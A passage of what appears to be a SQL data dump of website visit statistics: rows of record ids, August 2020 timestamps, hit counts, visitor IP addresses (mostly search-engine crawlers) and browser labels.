,'chrome'),(534761,1598225951,8,8,0,0,'109.108.71.11','other'),(534762,1598226653,71,71,0,0,'173.231.59.209','other'),(534763,1598226908,1,1,0,0,'62.205.134.182','other'),(534764,1598227123,8,8,0,0,'109.108.71.11','other'),(534765,1598227338,1,1,0,0,'66.249.64.56','chrome'),(534766,1598227424,1,1,0,0,'5.45.207.135','other'),(534767,1598228204,1,1,0,0,'66.249.70.76','chrome'),(534768,1598228280,1,1,0,0,'66.249.70.78','chrome'),(534769,1598228335,8,8,0,0,'109.108.71.11','other'),(534770,1598229001,2,2,0,0,'5.45.207.92','other'),(534771,1598229218,1,1,0,0,'157.55.39.226','other'),(534772,1598229517,1,1,0,0,'8.29.198.26','other'),(534773,1598229546,8,8,0,0,'109.108.71.11','other'),(534774,1598229689,1,1,0,0,'66.249.64.60','chrome'),(534775,1598229728,3,3,0,0,'34.67.214.127','chrome'),(534776,1598229729,1,1,0,0,'34.67.214.127','other'),(534777,1598229978,3,3,0,0,'35.193.52.247','chrome'),(534778,1598229979,1,1,0,0,'35.193.52.247','other'),(534779,1598230233,2,1,1,0,'66.249.70.76',''),(534780,1598230441,3,3,0,0,'34.66.13.105','chrome'),(534781,1598230442,1,1,0,0,'34.66.13.105','other'),(534782,1598230661,3,3,0,0,'34.68.239.71','chrome'),(534783,1598230662,1,1,0,0,'34.68.239.71','other'),(534784,1598230727,8,8,0,0,'109.108.71.11','other'),(534785,1598230767,3,3,0,0,'35.224.10.236','chrome'),(534786,1598230768,1,1,0,0,'35.224.10.236','other'),(534787,1598230793,1,1,0,0,'66.249.70.80','chrome'),(534788,1598230874,1,1,0,0,'66.249.64.56','chrome'),(534789,1598230907,3,3,0,0,'35.222.106.176','chrome'),(534790,1598230908,1,1,0,0,'35.222.106.176','other'),(534791,1598231603,1,1,0,0,'178.154.200.28','other'),(534792,1598231674,1,1,0,0,'66.249.70.78','chrome'),(534793,1598231778,12,12,0,0,'173.231.59.209','other'),(534794,1598231929,8,8,0,0,'109.108.71.11','other'),(534795,1598232293,1,1,0,0,'138.246.253.15','chrome'),(534796,1598232333,1,1,0,0,'157.55.39.226','other'),(534797,1598232732,1,1,0,0,'207.46.13.70','other'),(534798,1598232876,1,1,0,0,'5.255.253.69','other'),(534799,1598232975,2,2,0,0,'51.77.52.160','chrome'),(534800,1598233119,8,8,0,0,'109.108.71.11','other'),(534801,1598233153,2,2,0,0,'66.249.70.76','chrome'),(534802,1598233262,1,1,0,0,'66.249.70.80','chrome'),(534803,1598234045,1,1,0,0,'5.45.207.174','other'),(534804,1598234333,8,8,0,0,'109.108.71.11','other'),(534805,1598234472,1,1,0,0,'207.46.13.72','other'),(534806,1598234899,1,1,0,0,'5.45.207.75','chrome'),(534807,1598235051,4,4,0,0,'66.249.70.78','chrome'),(534808,1598235056,4,4,0,0,'66.249.70.76','chrome'),(534809,1598235585,8,8,0,0,'109.108.71.11','other'),(534810,1598235801,2,2,0,0,'66.249.70.80','chrome'),(534811,1598236698,1,1,0,0,'157.55.39.145','other'),(534812,1598236765,3,3,0,0,'66.249.70.76','chrome'),(534813,1598236813,8,8,0,0,'109.108.71.11','other'),(534814,1598237215,5,5,0,0,'66.249.70.78','chrome'),(534815,1598237732,1,1,0,0,'66.249.70.76','chrome'),(534816,1598238002,8,8,0,0,'109.108.71.11','other'),(534817,1598239238,8,8,0,0,'109.108.71.11','other'),(534818,1598239423,1,1,0,0,'66.249.64.58','chrome'),(534819,1598240135,2,2,0,0,'66.249.70.76','chrome'),(534820,1598240334,1,1,0,0,'8.29.198.26','other'),(534821,1598240465,8,8,0,0,'109.108.71.11','other'),(534822,1598241038,3,3,0,0,'66.249.70.80','chrome'),(534823,1598241239,3,3,0,0,'66.249.64.58','chrome'),(534824,1598241250,1,1,0,0,'66.249.64.56','chrome'),(534825,1598241255,1,1,0,0,'157.55.39.226','other'),(534826,1598241544,6,6,0,0,'66.249.70.76','chrome'),(534827,1598241704,8,8,0,0,'109.108.71.11','other'),(534828,1598241875,2,2,0,0,'66.249.70.78','chrome'),(534829,1598242441,2,2,0,0,'66.249.70.80','chrome'),(534830,1598242680,4,4,0,0,'66.249.70.76','chrome'),(534831,1598243159,1,1,0,0,'66.249.70.78','chrome'),(534832,1598244174,8,8,0,0,'109.108.71.11','other'),(534833,1598244561,1,1,0,0,'178.154.200.28','other'),(534834,1598244578,1,1,0,0,'66.249.70.76','chrome'),(534835,1598244763,1,1,0,0,'66.249.70.78','chrome'),(534836,1598244991,2,2,0,0,'66.249.70.80','chrome'),(534837,1598245219,1,1,0,0,'62.205.134.182','other'),(534838,1598245381,8,8,0,0,'109.108.71.11','other'),(534839,1598245872,3,3,0,0,'66.249.70.78','chrome'),(534840,1598246595,8,8,0,0,'109.108.71.11','other'),(534841,1598247373,3,3,0,0,'66.249.70.78','chrome'),(534842,1598247537,1,1,0,0,'66.249.64.58','chrome'),(534843,1598247564,2,2,0,0,'66.249.70.76','chrome'),(534844,1598247776,3,3,0,0,'66.249.70.80','chrome'),(534845,1598247822,8,8,0,0,'109.108.71.11','other'),(534846,1598248239,1,1,0,0,'157.55.39.82','other'),(534847,1598248521,3,3,0,0,'66.249.70.78','chrome'),(534848,1598249058,8,8,0,0,'109.108.71.11','other'),(534849,1598249159,1,1,0,0,'5.255.253.105','chrome'),(534850,1598249691,1,1,0,0,'5.45.207.174','other'),(534851,1598249868,1,1,0,0,'157.55.39.226','other'),(534852,1598250037,1,1,0,0,'91.213.119.95','chrome'),(534853,1598250088,1,1,0,0,'5.255.253.183','chrome'),(534854,1598250230,8,8,0,0,'109.108.71.11','other'),(534855,1598250533,2,2,0,0,'66.249.64.60','chrome'),(534856,1598250629,1,1,0,0,'5.45.207.92','other'),(534857,1598250652,1,1,0,0,'66.249.64.56','chrome'),(534858,1598250707,5,5,0,0,'66.249.70.78','chrome'),(534859,1598250712,1,1,0,0,'66.249.70.76','chrome'),(534860,1598250757,1,1,0,0,'178.154.200.48','chrome'),(534861,1598250854,3,3,0,0,'66.249.70.80','chrome'),(534862,1598250868,1,1,0,0,'5.45.207.174','other'),(534863,1598250926,2,2,0,0,'91.196.178.17','chrome'),(534864,1598250962,1,1,0,0,'66.249.64.58','chrome'),(534865,1598251155,1,1,0,0,'8.29.198.27','other'),(534866,1598251263,1,1,0,0,'207.46.13.50','other'),(534867,1598251395,1,1,0,0,'157.55.39.145','other'),(534868,1598251487,8,8,0,0,'109.108.71.11','other'),(534869,1598251691,2,2,0,0,'66.249.70.78','chrome'),(534870,1598251920,1,1,0,0,'157.55.39.73','other'),(534871,1598252035,1,1,0,0,'5.45.207.92','chrome'),(534872,1598252246,3,3,0,0,'66.249.70.76','chrome'),(534873,1598252339,1,1,0,0,'91.196.178.17','chrome'),(534874,1598252621,1,1,0,0,'66.249.70.78','chrome'),(534875,1598252708,2,2,0,0,'66.249.70.80','chrome'),(534876,1598252724,8,8,0,0,'109.108.71.11','other'),(534877,1598253938,8,8,0,0,'109.108.71.11','other'),(534878,1598254236,2,2,0,0,'66.249.70.78','chrome'),(534879,1598254459,1,1,0,0,'66.249.70.76','chrome'),(534880,1598255139,8,8,0,0,'109.108.71.11','other'),(534881,1598255270,1,1,0,0,'78.111.186.136','chrome'),(534883,1598255440,1,1,0,0,'157.55.39.145','other'),(534884,1598255803,1,1,0,0,'66.249.64.56','chrome'),(534885,1598256096,2,2,0,0,'66.249.70.80','chrome'),(534886,1598256393,1,1,0,0,'66.249.70.78','chrome'),(534887,1598256404,8,8,0,0,'109.108.71.11','other'),(534888,1598256498,1,1,0,0,'66.249.70.76','chrome'),(534889,1598256624,1,1,0,0,'66.249.64.60','chrome'),(534890,1598256839,1,1,0,0,'37.73.200.139','chrome'),(534891,1598257426,1,1,0,0,'157.55.39.145','other'),(534892,1598257613,4,4,0,0,'66.249.70.76','chrome'),(534893,1598257676,8,8,0,0,'109.108.71.11','other'),(534894,1598257926,1,1,0,0,'207.46.13.249','other'),(534895,1598258335,1,1,0,0,'91.196.178.150','chrome'),(534896,1598258797,1,1,0,0,'66.249.70.78','chrome'),(534897,1598259019,8,8,0,0,'109.108.71.11','other'),(534898,1598259544,1,1,0,0,'66.249.64.60','chrome'),(534899,1598260023,1,1,0,0,'66.249.70.76','chrome'),(534900,1598260272,8,8,0,0,'109.108.71.11','other'),(534901,1598261537,8,8,0,0,'109.108.71.11','other'),(534902,1598261735,1,1,0,0,'66.249.70.78','chrome'),(534903,1598261984,1,1,0,0,'8.29.198.27','other'),(534904,1598262088,1,1,0,0,'3.235.2.102','chrome'),(534905,1598262307,1,1,0,0,'176.105.192.113','chrome'),(534906,1598262798,8,8,0,0,'109.108.71.11','other'),(534907,1598263378,2,2,0,0,'66.249.64.58','chrome'),(534908,1598263551,2,2,0,0,'66.249.70.78','chrome'),(534909,1598264250,1,1,0,0,'5.45.207.174','other'),(534910,1598264411,9,9,0,0,'109.108.71.11','other'),(534911,1598264683,1,1,0,0,'66.249.70.78','chrome'),(534912,1598264819,1,1,0,0,'66.249.64.58','chrome'),(534913,1598264896,1,1,0,0,'5.45.207.146','chrome'),(534914,1598264918,1,1,0,0,'157.55.39.82','other'),(534915,1598264921,1,1,0,0,'5.255.253.77','chrome'),(534916,1598264973,3,3,0,0,'5.255.253.69','chrome'),(534917,1598265004,1,1,0,0,'66.249.70.76','chrome'),(534918,1598265086,1,1,0,0,'5.255.253.183','other'),(534919,1598265235,1,1,0,0,'5.255.253.136','chrome'),(534920,1598265244,3,3,0,0,'178.154.200.28','chrome'),(534921,1598265328,1,1,0,0,'141.8.142.80','chrome'),(534922,1598265376,2,2,0,0,'178.154.200.28','other'),(534923,1598265462,1,1,0,0,'178.154.200.74','chrome'),(534924,1598265480,8,8,0,0,'109.108.71.11','other'),(534925,1598265589,1,1,0,0,'5.45.207.92','chrome'),(534926,1598265651,1,1,0,0,'66.249.70.80','chrome'),(534927,1598265788,1,1,0,0,'178.154.200.48','chrome'),(534928,1598265902,1,1,0,0,'5.255.253.69','chrome'),(534929,1598265970,1,1,0,0,'5.255.253.105','chrome'),(534930,1598265986,1,1,0,0,'213.180.203.75','chrome'),(534931,1598266079,1,1,0,0,'207.46.13.70','other'),(534932,1598266082,1,1,0,0,'5.45.207.174','chrome'),(534933,1598266388,1,1,0,0,'5.45.207.92','other'),(534934,1598266429,1,1,0,0,'5.45.207.134','chrome'),(534935,1598266651,1,1,0,0,'5.45.207.146','chrome'),(534936,1598266653,1,1,0,0,'5.255.253.183','chrome'),(534937,1598266745,8,8,0,0,'109.108.71.11','other'),(534938,1598266917,1,1,0,0,'178.154.200.80','chrome'),(534939,1598266920,1,1,0,0,'178.154.200.244','chrome'),(534940,1598266921,2,2,0,0,'213.180.203.85','chrome'),(534941,1598267688,1,1,0,0,'213.180.203.49','chrome'),(534942,1598267721,1,1,0,0,'5.255.253.69','chrome'),(534943,1598267828,2,2,0,0,'91.196.178.91','chrome'),(534944,1598267832,1,1,0,0,'66.249.70.76','chrome'),(534945,1598267989,1,1,0,0,'207.46.13.70','other'),(534946,1598268803,8,8,0,0,'109.108.71.11','other'),(534947,1598269196,1,1,0,0,'109.74.154.72','chrome'),(534948,1598269690,1,1,0,0,'207.46.13.11','other'),(534949,1598269753,1,1,0,0,'91.196.178.131','chrome'),(534950,1598269811,1,1,0,0,'157.55.39.143','other'),(534951,1598270045,8,8,0,0,'109.108.71.11','other'),(534952,1598270240,1,1,0,0,'66.249.70.80','chrome'),(534953,1598271294,8,8,0,0,'93.158.66.49','other'),(534954,1598271295,2,2,0,0,'93.158.66.44','other'),(534956,1598271297,3,3,0,0,'93.158.66.47','other'),(534957,1598271307,2,2,0,0,'93.158.66.45','other'),(534959,1598271308,1,1,0,0,'93.158.66.46','other'),(534960,1598271370,2,2,0,0,'93.158.66.48','other'),(534961,1598271371,2,2,0,0,'93.158.66.43','other'),(534962,1598271383,8,8,0,0,'109.108.71.11','other'),(534963,1598271394,2,2,0,0,'93.158.66.42','other'),(534964,1598271584,2,2,0,0,'66.249.70.80','chrome'),(534965,1598271689,1,1,0,0,'207.46.13.1','other'),(534966,1598272567,1,1,0,0,'178.154.200.60','chrome'),(534967,1598272648,8,8,0,0,'109.108.71.11','other'),(534968,1598272742,1,1,0,0,'66.249.70.78','chrome'),(534969,1598272816,1,1,0,0,'8.29.198.25','other'),(534970,1598272873,1,1,0,0,'66.249.64.58','chrome'),(534971,1598273008,2,2,0,0,'157.55.39.145','other'),(534972,1598273130,1,1,0,0,'207.46.13.14','other'),(534973,1598273230,1,1,0,0,'207.46.13.249','other'),(534974,1598273978,8,8,0,0,'109.108.71.11','other'),(534975,1598274070,2,2,0,0,'207.46.13.154','other'),(534976,1598274346,1,1,0,0,'66.249.64.56','chrome'),(534977,1598274985,8,8,0,0,'109.108.71.11','other'),(534978,1598275033,2,2,0,0,'52.12.49.18','chrome'),(534979,1598275203,1,1,0,0,'188.191.236.187','chrome'),(534980,1598275458,1,1,0,0,'5.255.253.136','chrome'),(534981,1598275668,1,1,0,0,'66.249.70.76','chrome'),(534982,1598275678,2,2,0,0,'5.45.207.174','chrome'),(534983,1598275992,1,1,0,0,'5.255.253.183','chrome'),(534984,1598276030,8,8,0,0,'109.108.71.11','other'),(534985,1598276122,1,1,0,0,'128.199.52.250','other'),(534986,1598276447,1,1,0,0,'81.4.151.158','chrome'),(534987,1598276701,1,1,0,0,'66.249.64.58','chrome'),(534988,1598276906,1,1,0,0,'91.196.178.17','chrome'),(534989,1598276937,1,1,0,0,'178.159.37.88','chrome'),(534990,1598276983,8,8,0,0,'109.108.71.11','other'),(534991,1598277123,5,5,0,0,'5.45.207.174','chrome'),(534992,1598277233,1,1,0,0,'157.55.39.167','other'),(534993,1598277681,2,2,0,0,'5.255.253.136','chrome'),(534994,1598277728,1,1,0,0,'131.220.6.152','chrome'),(534995,1598277812,1,1,0,0,'66.249.70.76','chrome'),(534996,1598277847,1,1,0,0,'5.255.253.105','chrome'),(534997,1598278025,1,1,0,0,'5.255.253.151','chrome'),(534998,1598278239,8,8,0,0,'109.108.71.11','other'),(534999,1598278496,1,1,0,0,'66.249.64.60','chrome'),(535000,1598278605,1,1,0,0,'5.45.207.92','chrome'),(535001,1598278979,1,1,0,0,'5.255.253.88','chrome'),(535002,1598279029,1,1,0,0,'213.180.203.38','chrome'),(535003,1598279332,1,1,0,0,'178.154.200.28','chrome'),(535004,1598279440,8,8,0,0,'109.108.71.11','other'),(535005,1598279468,1,1,0,0,'5.45.207.174','other'),(535006,1598279514,1,1,0,0,'5.255.253.65','other'),(535007,1598279517,1,1,0,0,'178.154.200.32','other'),(535008,1598279533,1,1,0,0,'141.8.142.68','chrome'),(535009,1598279656,1,1,0,0,'5.45.207.174','chrome'),(535010,1598279752,1,1,0,0,'91.196.178.17','chrome'),(535011,1598279934,1,1,0,0,'5.45.207.92','chrome'),(535012,1598280044,1,1,0,0,'5.255.253.142','chrome'),(535013,1598280621,8,8,0,0,'109.108.71.11','other'),(535014,1598281138,1,1,0,0,'66.249.70.80','chrome'),(535015,1598281818,8,8,0,0,'109.108.71.11','other'),(535016,1598282080,1,1,0,0,'178.154.200.48','chrome'),(535017,1598282619,2,2,0,0,'5.45.207.174','chrome'),(535018,1598282665,1,1,0,0,'178.154.200.28','chrome'),(535019,1598283262,1,1,0,0,'5.45.207.92','chrome'),(535020,1598283580,1,1,0,0,'66.249.64.56','chrome'),(535021,1598283645,1,1,0,0,'8.29.198.27','other'),(535022,1598284220,1,1,0,0,'91.196.178.151','chrome'),(535023,1598284586,1,1,0,0,'66.249.70.76','chrome'),(535024,1598284980,1,1,0,0,'178.154.200.28','chrome'),(535025,1598285291,70,70,0,0,'173.231.59.209','other'),(535026,1598286322,1,1,0,0,'5.255.253.183','chrome'),(535027,1598286881,1,1,0,0,'66.249.70.76','chrome'),(535028,1598287048,1,1,0,0,'178.154.200.28','chrome'),(535029,1598287169,1,1,0,0,'5.45.207.174','chrome'),(535030,1598287262,1,1,0,0,'66.249.64.60','chrome'),(535031,1598287315,1,1,0,0,'157.55.39.145','other'),(535032,1598287572,1,1,0,0,'66.249.70.78','chrome'),(535033,1598287772,1,1,0,0,'5.45.207.75','chrome'),(535034,1598287813,1,1,0,0,'207.46.13.14','other'),(535035,1598287916,1,1,0,0,'5.45.207.92','chrome'),(535036,1598288310,1,1,0,0,'178.154.200.28','chrome'),(535037,1598288544,1,1,0,0,'162.253.129.173','chrome'),(535038,1598288737,1,1,0,0,'5.255.253.105','chrome'),(535039,1598288758,1,1,0,0,'91.196.178.181','chrome'),(535040,1598288776,1,1,0,0,'207.46.13.224','other'),(535041,1598288881,1,1,0,0,'157.55.39.73','other'),(535042,1598288988,2,2,0,0,'5.255.253.183','chrome'),(535043,1598289227,1,1,0,0,'5.255.253.69','chrome'),(535044,1598289304,1,1,0,0,'5.255.253.136','chrome'),(535045,1598289509,1,1,0,0,'5.45.207.92','chrome'),(535046,1598289557,1,1,0,0,'207.46.13.154','other'),(535047,1598289934,1,1,0,0,'178.154.200.28','chrome'),(535048,1598290334,1,1,0,0,'157.55.39.167','other'),(535049,1598290446,12,12,0,0,'173.231.59.209','other'),(535050,1598290877,1,1,0,0,'178.154.200.48','chrome'),(535051,1598291455,1,0,1,0,'66.249.70.78',''),(535052,1598291614,2,2,0,0,'5.255.253.136','chrome'),(535053,1598291618,1,1,0,0,'5.255.253.69','chrome'),(535054,1598291661,1,1,0,0,'91.196.178.84','chrome'),(535055,1598291868,1,1,0,0,'88.99.137.13','chrome'),(535056,1598292100,1,1,0,0,'178.154.200.28','other'),(535057,1598292452,1,1,0,0,'157.55.39.226','other'),(535058,1598292867,1,1,0,0,'5.255.253.105','chrome'),(535059,1598293187,1,1,0,0,'195.10.210.70','chrome'),(535060,1598293308,1,1,0,0,'5.255.253.69','chrome'),(535061,1598293859,1,1,0,0,'178.154.200.28','chrome'),(535062,1598294118,1,1,0,0,'5.255.253.183','chrome'),(535063,1598294190,1,1,0,0,'5.45.207.174','chrome'),(535064,1598294468,1,1,0,0,'8.29.198.26','other'),(535065,1598295188,1,1,0,0,'5.45.207.92','other'),(535066,1598295585,1,1,0,0,'5.45.207.174','chrome'),(535067,1598295690,2,2,0,0,'5.255.253.136','chrome'),(535068,1598296725,1,1,0,0,'157.55.39.82','other'),(535069,1598297357,1,1,0,0,'5.255.253.69','chrome'),(535070,1598297648,2,1,1,0,'66.249.70.76',''),(535071,1598297719,1,1,0,0,'5.45.207.174','chrome'),(535072,1598298135,1,1,0,0,'207.46.13.70','other'),(535073,1598298963,1,1,0,0,'5.255.253.136','chrome'),(535074,1598299062,1,1,0,0,'5.45.207.92','chrome'),(535075,1598299747,1,1,0,0,'66.249.70.80','chrome'),(535076,1598299857,2,2,0,0,'178.154.200.28','chrome'),(535077,1598299876,1,1,0,0,'5.45.207.174','chrome'),(535078,1598299910,1,1,0,0,'157.55.39.73','other'),(535079,1598299937,1,1,0,0,'66.249.70.76','chrome'),(535080,1598300468,2,2,0,0,'5.45.207.92','chrome'),(535081,1598301020,1,1,0,0,'66.249.70.76','chrome'),(535082,1598301742,1,1,0,0,'5.45.207.92','chrome'),(535083,1598301807,2,2,0,0,'5.45.207.174','chrome'),(535084,1598301907,1,1,0,0,'178.154.200.28','chrome'),(535085,1598301973,2,2,0,0,'95.213.141.126','opera'),(535086,1598302182,1,1,0,0,'157.55.39.73','other'),(535087,1598302537,1,1,0,0,'5.255.253.183','chrome'),(535088,1598302605,1,1,0,0,'5.255.253.88','chrome'),(535089,1598302608,2,2,0,0,'66.249.70.76','chrome'),(535090,1598302636,1,1,0,0,'66.249.70.80','chrome'),(535091,1598302739,1,1,0,0,'66.249.64.56','chrome'),(535092,1598302743,1,1,0,0,'157.55.39.167','other'),(535093,1598303182,1,1,0,0,'178.154.200.28','chrome'),(535094,1598303470,1,1,0,0,'213.180.203.85','chrome'),(535095,1598304107,1,1,0,0,'5.45.207.92','chrome'),(535096,1598304232,1,1,0,0,'5.255.253.69','chrome'),(535097,1598304252,1,1,0,0,'66.249.64.58','chrome'),(535098,1598304368,1,1,0,0,'191.102.156.207','chrome'),(535099,1598304382,1,1,0,0,'206.41.174.3','chrome'),(535100,1598304566,2,2,0,0,'66.249.70.80','chrome'),(535101,1598304621,2,2,0,0,'66.249.70.78','chrome'),(535102,1598304963,2,2,0,0,'5.45.207.174','chrome'),(535103,1598305054,1,1,0,0,'207.46.13.14','other'),(535104,1598305225,2,2,0,0,'5.45.207.92','chrome'),(535105,1598305297,1,1,0,0,'8.29.198.27','other'),(535106,1598305412,1,1,0,0,'157.55.39.73','other'),(535107,1598305578,1,1,0,0,'66.249.70.76','chrome'),(535108,1598306513,2,2,0,0,'66.249.70.78','chrome'),(535109,1598306592,1,1,0,0,'5.45.207.174','chrome'),(535110,1598306628,1,1,0,0,'5.45.207.174','other'),(535111,1598306900,1,1,0,0,'5.45.207.92','chrome'),(535112,1598307302,2,2,0,0,'66.249.70.76','chrome'),(535113,1598307432,1,1,0,0,'178.154.200.28','chrome'),(535114,1598307438,1,1,0,0,'66.249.64.58','chrome'),(535115,1598307582,2,2,0,0,'5.45.207.174','chrome'),(535116,1598307917,2,2,0,0,'5.255.253.88','chrome'),(535117,1598307935,1,1,0,0,'5.255.253.183','other'),(535118,1598308384,1,1,0,0,'66.249.70.80','chrome'),(535119,1598308627,1,1,0,0,'178.154.200.28','chrome'),(535120,1598308830,2,2,0,0,'66.249.70.78','chrome'),(535121,1598309374,2,2,0,0,'66.249.70.76','chrome'),(535122,1598309448,4,4,0,0,'5.45.207.174','chrome'),(535123,1598310067,1,1,0,0,'207.46.13.70','other'),(535124,1598310241,1,1,0,0,'5.255.253.151','chrome'),(535125,1598310532,1,1,0,0,'66.249.70.80','chrome'),(535126,1598310641,1,1,0,0,'66.249.64.60','chrome'),(535127,1598311037,2,2,0,0,'178.154.200.28','chrome'),(535128,1598311144,1,1,0,0,'178.154.200.116','chrome'),(535129,1598311405,1,1,0,0,'5.45.207.174','chrome'),(535130,1598311663,1,1,0,0,'66.249.70.78','chrome'),(535131,1598311821,1,1,0,0,'178.154.200.28','other'),(535132,1598311924,1,1,0,0,'66.249.70.76','chrome'),(535133,1598312435,2,1,1,0,'66.249.70.80',''),(535134,1598312546,1,1,0,0,'78.46.176.21','other'),(535135,1598313308,1,1,0,0,'62.205.134.182','other'),(535136,1598313481,1,1,0,0,'5.255.253.69','chrome'),(535137,1598313545,1,1,0,0,'66.249.64.58','chrome'),(535138,1598313566,1,1,0,0,'17.58.99.84','other'),(535139,1598313693,1,1,0,0,'66.249.70.80','chrome'),(535140,1598313956,1,1,0,0,'178.154.200.28','chrome'),(535141,1598314019,1,1,0,0,'209.17.96.130','other'),(535142,1598314386,1,1,0,0,'178.154.200.32','chrome'),(535143,1598314451,1,1,0,0,'5.255.253.88','chrome'),(535144,1598314546,1,1,0,0,'157.55.39.143','other'),(535145,1598314996,2,2,0,0,'66.249.70.80','chrome'),(535146,1598315077,1,1,0,0,'5.45.207.174','chrome'),(535147,1598315150,1,1,0,0,'5.45.207.174','other'),(535148,1598315363,1,1,0,0,'17.58.99.7','other'),(535149,1598316118,1,1,0,0,'8.29.198.25','other'),(535150,1598316258,1,1,0,0,'207.46.13.190','other'),(535151,1598316287,1,1,0,0,'5.255.253.69','chrome'),(535152,1598316950,2,2,0,0,'5.45.207.174','chrome'),(535153,1598317123,3,3,0,0,'66.249.70.80','chrome'),(535154,1598317183,1,1,0,0,'178.154.200.28','chrome'),(535155,1598317784,1,1,0,0,'5.255.253.136','chrome'),(535156,1598317857,1,1,0,0,'66.249.64.56','chrome'),(535157,1598318079,1,1,0,0,'5.45.207.92','chrome'),(535158,1598318082,3,3,0,0,'5.45.207.174','chrome'),(535159,1598318159,1,1,0,0,'157.55.39.82','other'),(535160,1598318867,1,1,0,0,'207.46.13.70','other'),(535161,1598319405,2,2,0,0,'5.45.207.92','chrome'),(535162,1598319570,1,1,0,0,'5.45.207.174','chrome'),(535163,1598319983,1,1,0,0,'66.249.70.76','chrome'),(535164,1598320630,1,1,0,0,'66.249.70.80','chrome'),(535165,1598320636,1,1,0,0,'66.249.70.78','chrome'),(535166,1598320668,1,1,0,0,'66.249.64.56','chrome'),(535167,1598320727,1,1,0,0,'5.45.207.92','chrome'),(535168,1598320931,1,1,0,0,'157.55.39.167','other'),(535169,1598321143,1,1,0,0,'66.249.70.76','chrome'),(535170,1598321521,1,1,0,0,'178.154.200.28','chrome'),(535171,1598321604,1,1,0,0,'66.249.64.60','chrome'),(535172,1598321802,1,1,0,0,'5.255.253.105','chrome'),(535173,1598322158,1,1,0,0,'178.154.200.28','other'),(535174,1598322186,3,3,0,0,'66.249.70.78','chrome'),(535175,1598322202,3,3,0,0,'66.249.70.76','chrome'),(535176,1598322229,1,1,0,0,'66.249.64.58','chrome'),(535177,1598322691,1,1,0,0,'178.154.200.28','chrome'),(535178,1598322746,1,1,0,0,'66.249.70.80','chrome'),(535179,1598322964,1,1,0,0,'5.45.207.174','other'),(535180,1598323447,1,1,0,0,'66.249.73.48','chrome'),(535181,1598323684,1,1,0,0,'5.45.207.92','chrome'),(535182,1598323716,1,1,0,0,'5.45.207.174','chrome'),(535183,1598323915,3,3,0,0,'66.249.70.76','chrome'),(535184,1598324171,2,2,0,0,'66.249.70.80','chrome'),(535185,1598324215,1,1,0,0,'178.154.200.48','chrome'),(535186,1598324285,1,1,0,0,'66.249.70.78','chrome'),(535187,1598324309,2,2,0,0,'178.154.200.28','chrome'),(535188,1598324749,1,1,0,0,'157.55.39.145','other'),(535189,1598324834,1,1,0,0,'66.249.70.76','chrome'),(535190,1598324899,1,1,0,0,'5.45.207.174','chrome'),(535191,1598325759,1,1,0,0,'207.46.13.14','other'),(535192,1598325769,2,2,0,0,'66.249.70.80','chrome'),(535193,1598325837,1,1,0,0,'5.255.253.136','chrome'),(535194,1598326013,1,1,0,0,'5.45.207.92','other'),(535195,1598326156,1,1,0,0,'66.249.64.56','chrome'),(535196,1598326188,3,3,0,0,'66.249.70.76','chrome'),(535197,1598326200,1,1,0,0,'157.55.39.82','other'),(535198,1598326906,1,1,0,0,'17.58.99.84','other'),(535199,1598326945,1,1,0,0,'8.29.198.25','other'),(535200,1598326965,1,1,0,0,'178.154.200.28','chrome'),(535201,1598327367,3,3,0,0,'5.45.207.92','chrome'),(535202,1598327450,3,3,0,0,'66.249.70.76','chrome'),(535203,1598327515,4,4,0,0,'66.249.70.78','chrome'),(535204,1598327581,1,1,0,0,'5.45.207.135','other'),(535205,1598328112,2,2,0,0,'178.154.200.28','chrome'),(535206,1598328712,1,1,0,0,'5.45.207.174','chrome'),(535207,1598328807,1,1,0,0,'64.137.120.181','chrome'),(535208,1598328815,1,1,0,0,'155.94.171.123','chrome'),(535209,1598329826,2,2,0,0,'66.249.70.78','chrome'),(535210,1598330017,1,1,0,0,'157.55.39.143','other'),(535211,1598330201,1,1,0,0,'5.255.253.105','other'),(535212,1598330224,1,1,0,0,'178.154.200.28','chrome'),(535213,1598330601,1,1,0,0,'217.160.28.161','chrome'),(535214,1598331029,1,1,0,0,'5.255.253.183','chrome'),(535215,1598331469,1,1,0,0,'66.249.64.60','chrome'),(535216,1598331501,1,1,0,0,'66.249.70.76','chrome'),(535217,1598331512,1,1,0,0,'66.249.70.78','chrome'),(535218,1598331583,1,1,0,0,'66.249.70.80','chrome'),(535219,1598331697,2,2,0,0,'66.249.64.56','chrome'),(535220,1598331765,1,1,0,0,'62.205.134.182','other'),(535221,1598332696,1,1,0,0,'5.45.207.92','chrome'),(535222,1598333241,3,3,0,0,'66.249.70.80','chrome'),(535223,1598333279,1,1,0,0,'66.249.70.76','chrome'),(535224,1598333393,1,1,0,0,'66.249.70.78','chrome'),(535225,1598333740,2,2,0,0,'17.58.99.84','other'),(535226,1598333783,2,2,0,0,'178.154.200.28','chrome'),(535227,1598334363,1,1,0,0,'5.45.207.92','chrome'),(535228,1598334816,1,1,0,0,'51.91.129.4','firefox'),(535229,1598334840,2,2,0,0,'66.249.70.78','chrome'),(535230,1598334916,2,2,0,0,'66.249.70.80','chrome'),(535231,1598334917,1,1,0,0,'178.95.245.101','chrome'),(535232,1598334946,1,1,0,0,'178.154.200.28','chrome'),(535233,1598335127,1,1,0,0,'5.45.207.174','chrome'),(535234,1598335498,1,1,0,0,'66.249.64.58','chrome'),(535235,1598335628,1,1,0,0,'5.255.253.183','chrome'),(535236,1598335635,1,1,0,0,'212.90.179.190','chrome'),(535237,1598336007,2,2,0,0,'178.154.200.28','chrome'),(535238,1598336093,1,1,0,0,'5.45.207.174','chrome'),(535239,1598336205,1,1,0,0,'66.249.70.76','chrome'),(535240,1598337146,1,1,0,0,'66.249.70.76','chrome'),(535241,1598337773,1,1,0,0,'8.29.198.25','other'),(535242,1598338374,1,1,0,0,'206.217.137.205','chrome'),(535243,1598338571,1,1,0,0,'66.249.70.80','chrome'),(535244,1598339180,1,1,0,0,'66.249.70.78','chrome'),(535245,1598339353,1,1,0,0,'178.154.200.28','other'),(535246,1598339607,1,1,0,0,'178.154.200.28','chrome'),(535247,1598339697,2,2,0,0,'95.134.189.12','chrome'),(535248,1598339918,1,1,0,0,'5.255.253.88','chrome'),(535249,1598340473,1,1,0,0,'5.45.207.135','other'),(535250,1598340490,2,2,0,0,'17.58.99.7','other'),(535251,1598340546,1,1,0,0,'5.45.207.174','chrome'),(535252,1598340728,6,6,0,0,'91.196.178.92','chrome'),(535253,1598340909,1,1,0,0,'66.249.70.78','chrome'),(535254,1598340932,1,1,0,0,'5.255.253.183','chrome'),(535255,1598341025,1,1,0,0,'178.154.200.28','chrome'),(535256,1598341190,1,1,0,0,'31.13.127.14','other'),(535257,1598341191,1,1,0,0,'31.13.127.111','other'),(535258,1598341193,1,1,0,0,'31.13.127.